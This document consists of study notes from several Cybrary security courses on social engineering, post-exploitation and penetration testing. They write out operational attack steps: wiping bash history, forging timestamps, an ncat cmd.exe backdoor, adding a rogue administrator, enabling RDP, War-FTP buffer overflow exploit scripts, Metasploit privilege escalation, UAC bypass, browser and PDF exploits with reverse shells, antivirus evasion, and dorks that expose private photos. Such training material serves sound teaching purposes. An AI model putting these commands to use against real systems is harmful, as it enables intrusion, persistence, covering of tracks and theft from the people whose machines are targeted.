Course: Dean Pompilio on "Social Engineering and Manipulation" at Cybrary

Social Engineering (SE) Tools:

*Cewl
Use Cewl’s spidering process to generate a word list for password cracking

*Cupp
This tool allows you to generate a list of possible passwords to use in the Dictionary file.
cupp.py -l
cupp.py -

*Creepy
Account enumerator tool that does account harvesting

*Dradis
SE platform

*Google
[site: edu|org + inurl:"faculty_login.asp | .php"
intitle:"Index Of" intext:"iCloud Photos" ORintext:"My Photo Stream" OR intext:"Camera Roll"
intitle:"Index of" "DCIM"
inurl"CrazyWWWBoard.cgi intext:"detailed debugging information"
intitle:"Retina Report" intext:"Confidential Information"]

*Maltego
Data visualization tool

*Recon-NG
show modules
use netcraft
set  source [ANY WEBSITE NAME]
show hosts
use recon/hosts-hosts/resolve
run
use discovery/info_disclosure/interesting_files
use recon/domains-hosts/brute_hosts
use ipinfodb
use pgp
del contactds 1-12
use recon/contacts-credentials/pwnedlist
use reporting/html

*Scythe Framework
Account enumerator tool that does account harvesting. 

*Creepy
Allows to do geolocation for a target by using various social networking platforms to track individuals.

*Shodan
Crawls the Internet and identifies IP addresses that have a service running. Then it does a banner grab of the service that is running, and it saves the banner information. 

Social Engineering Toolkit (SET) [*use TinyURL to obfuscate links]

Course:  Joe Perry on "Post Exploitation Hacking" at Cybrary

Linux Tracks
~/.bash-history
cp ~/.bash-history ~/.bash-history-save
rm ~/.bash-history OR /dev/null > ~/.bash-history

Linux Timestamps​
•touch -t '1 May 2005 10:22' file

Windows Event Logs
•They’re managed on the command line by wevtutil
Wevtutil –el output
Wevtutil -cl

Course:  Joe Perry on "Post Exploitation Hacking" at Cybrary
​
I. Remote Desktop Protocol - RDP
*Windows native RDP 
*Chrome RDP (or any other third-party RDP)

Setting up the Windows Firewall
Netsh advfirewall firewall set rule group=“remote desktop” new enable=Yes

•Netsh – network administration tool
•Advfirewall – identifies that you’re working with the windows “advanced” firewall
•Firewall – specifies that this is an actual firewall operation, not something else governed by advfirewall
•Set rule group=“remote desktop” – assigning a value to that specific group
•Enable=Yes – allow rdp connections

Editing the registry key
Reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f

•Reg add – editing a registry to put something new into it
•“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” – the actual key we’re going to be messing with.
•/v fDenyTSConnections – the field (“Value”) we’re putting in
•/t REG_DWORD – the data type (Int/DWORD/string/etc)
•/d 0 – the actual value correspondent to the field label
•/f – force 

II. Ncat Backdoor
ncat –lkp 51000 –e “cmd.exe”

•Lkp – listen persistently on port 51000
•-e “cmd.exe” – when you receive a connection, execute this command and take control of the IO pipes

III. New User
net user /add Acct4 ThisPassW0rd
net localgroup Administrators /add Acct4

IV. Scheduled arrival
Schtasks
At 

Course:  Joe Perry on "Post Exploitation Hacking" at Cybrary
​​
Workstation and Network Analysis 

I. Linux
A. Workstation
•Ifconfig
•Netstat (+netstat -g/ -r/ -i/ -s)
•Arp
•/etc/nsswitch.conf
•/etc/resolve.conf

B. Network
•Ping/traceroute •Ping –t 1 <target> (Identify your default gateway)
•Nmap
•P0f [passive OS fingerprinting]
•Tcpdump
•Tshark

II. Windows
A. Workstation
•Ipconfig
•Netstat
•Arp
•Net * (there’s a lot)

B. Network
•nslookup
•Tracert
net *  •Accounts; •Config; •Group; •Session; •Statistics; •View; •Start
Wmic [Windows Management Instrumentation] 
E.g., Wmic Useraccount
E.g., Wmic startup get caption,command

Course:  Joe Perry on "Post Exploitation Hacking" at Cybrary
​
I. Ethernet Header:
•Src: Vmware_22:dd:ce (00:0c:29:22:dd:ce), Dst: Vmware_ff:1f:72 (00:50:56:ff:1f:72)
•Destination: Vmware_ff:1f:72 (00:50:56:ff:1f:72)
•Address: Vmware_ff:1f:72 (00:50:56:ff:1f:72)
•        .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
•        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)

II. IP Header
•Internet Protocol Version 4, Src: 192.168.129.128 (192.168.129.128), Dst: 31.13.71.128 (31.13.71.128)
•    Version: 4    Header length: 20 bytes   
•Differentiated Services Field: 0x00 (DSCP 0x00: Default; ECN: 0x00: Not-ECT (Not ECN-Capable Transport))
•        0000 00.. = Differentiated Services Codepoint: Default (0x00)
•        .... ..00 = Explicit Congestion Notification: Not-ECT (Not ECN-Capable Transport) (0x00)
•    Total Length: 40    Identification: 0x0364 (868)
•    Flags: 0x02 (Don't Fragment)
•        0... .... = Reserved bit: Not set
•        .1.. .... = Don't fragment: Set
•        ..0. .... = More fragments: Not set
•    Fragment offset: 0    Time to live: 64    Protocol: TCP (6)
•    Header checksum: 0x8eb6 [validation disabled]
•        [Good: False]
•        [Bad: False]
•    Source: 192.168.129.128 (192.168.129.128)    Destination: 31.13.71.128 (31.13.71.128)
•    [Source GeoIP: Unknown]    [Destination GeoIP: Unknown]

III. TCP header
•Transmission Control Protocol, Src Port: 44277 (44277), Dst Port: https (443), Seq: 2537, Ack: 19459, Len: 0
•Source port: 44277 (44277)    Destination port: https (443)
•Sequence number: 2537    (relative sequence number)    Acknowledgment number: 19459    (relative ack number)
•    Header length: 20 bytes
•    Flags: 0x010 (ACK)
•        000. .... .... = Reserved: Not set
•        ...0 .... .... = Nonce: Not set
•        .... 0... .... = Congestion Window Reduced (CWR): Not set
•        .... .0.. .... = ECN-Echo: Not set
•        .... ..0. .... = Urgent: Not set
•        .... ...1 .... = Acknowledgment: Set
•        .... .... 0... = Push: Not set
•        .... .... .0.. = Reset: Not set
•        .... .... ..0. = Syn: Not set
•        .... .... ...0 = Fin: Not set
•    Window size value: 65160
•Checksum: 0xa8d0 [validation disabled]

​IV. UDP Header
•User Datagram Protocol, Src Port: db-lsp-disc (17500), Dst Port: db-lsp-disc (17500)
•    Source port: db-lsp-disc (17500)
•    Destination port: db-lsp-disc (17500)
•    Length: 122
•    Checksum: 0x5b02 [validation disabled]
•        [Good Checksum: False]
•        [Bad Checksum: False]

Course:  Georgia Weidman on "Advanced Penetration Testing" at Cybrary

*Give the program too much input in the username (USER) field
*Saved return pointer will be overwritten with our attack controlled input

I. Exploit Skeleton -> War-FTP 1.65 USER Buffer Overflow

#!/usr/bin/python
import socket
buffer = "A" * 1100
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.5.44',21))*
response = s.recv(1024)
print response
s.send('USER ' + buffer + '\r\n')
response = s.recv(1024)
print response
s.send('PASS PASSWORD\r\n')
s.close()

II. Immunity Debugger -> Attach to the Process

III. Mona.py
A exploit development plugin for Immunity Debugger and WinDGB by the Corelan Team.

Setup logging:!mona config -set workingfolder C:\logs\%p

Identifying the Overwrite​
!mona pattern_create 1100

IV. Mona Findmsp
Use !mona findmsp to find all instances of part or all of the cyclic pattern in memory

Finds if the pattern is in the registers (i.e. EIP) and the offset from the beginning of the pattern​

Verifying Offsets
#!/usr/bin/python
import socket
buffer = "A" * 485 + "B" * 4 + "C" * 611
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.20.10',21))
response = s.recv(1024)
print response
s.send('USER ' + buffer + '\r\n')
response = s.recv(1024)
print response
s.send('PASS PASSWORD\r\n')
s.close()

Course:  Georgia Weidman on "Advanced Penetration Testing" at Cybrary
​
x86 General Purpose Registers
EIP - instruction pointer
ESP - stack pointer
EBP - base pointer
ESI -  source index
EDI - destination index
EAX - accumulator
EBX - base
ECX - counter
EDX - data 

Sample of Vulnerable Code (C) overflowtest.c:
include #include

void overflowed() {
printf("%s\n", "Execution Hijacked");
}

void function1(char *str){
char buffer[5]; strcpy(buffer, str);
}

void main(int argc, char *argv[]) {
function1(argv[1]);
printf("%s\n", "Executed normally");
}

Vulnerability:
(1) Strcpy does not perform bounds checking.
(2) Uses Strcpy to copy user input into a fixed sized variable.
​
Therefore, if we give it more data than the variable can hold, the copying will continue into adjacent memory addresses.

Course:  Georgia Weidman on "Advanced Penetration Testing" at Cybrary
​
(1) Metasploit Scripts:
msf > use post/windows/gather/enum_logged_on_users

(2) Railgun
Extension for Meterpreter that allows access to the Windows API
meterpreter > irb
>> client.railgun.shell32.IsUserAnAdmin

(3) Local Privilege Escalation: GetSystem
meterpreter > getsystem

(4) Local Privilege Escalation: Local Exploits
msf > use exploit/windows/local/ms11_080_afdjoinleaf
msf exploit(ms11_080_afdjoinleaf) > set payload windows/meterpreter/reverse_tcp

(5) Local Privilege Escalation: Bypassing UAC
msf >use exploit/windows/local/bypassuac

(6) Local Privilege Escalation: Using a Public Exploit
Public exploit in /usr/share/exploitdb

Course:  Georgia Weidman on "Advanced Penetration Testing" at Cybrary
​
Trojans:  Bypassing Anti-Virus Signature Detection

Techniques:
1- Binary Embedding 
2- Metasploit Encoding​
3- Multi-Encoding​
4- Combining Tecnniques
5- Custom Compiling
6- Creating Shellcode
7- Hyperion 
8- Veil

Course:  Georgia Weidman on "Advanced Penetration Testing" at Cybrary
​
(1) Client Side Exploits
Browser Attacks
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set SRVHOST 192.168.20.9
SRVHOST => 192.168.20.9
msf exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms10_002_aurora) > set URIPATH aurora
URIPATH => aurora
msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > set LHOST 192.168.20.9
LHOST => 192.168.20.9
msf exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.20.9:4444
[*] Using URL: http://192.168.20.9:80/aurora

(2) Automatically Migrating
msf exploit(ms10_002_aurora) > set PrependMigrate true

(3) PDF Exploits
msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf) > show options
msf exploit(adobe_utilprintf) > exploit
[*] Creating 'msf.pdf' file...
[+] msf.pdf stored at /root/.msf4/local/msf.pdf
msf exploit(adobe_utilprintf) > cp /root/.msf4/local/msf.pdf /var/www
[*] exec: cp /root/.msf4/local/msf.pdf /var/www
msf exploit(adobe_utilprintf) > service apache2 start
[*] exec service apache2 start
Starting web server: apache2.
msf exploit(adobe_utilprintf) > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.20.9:4444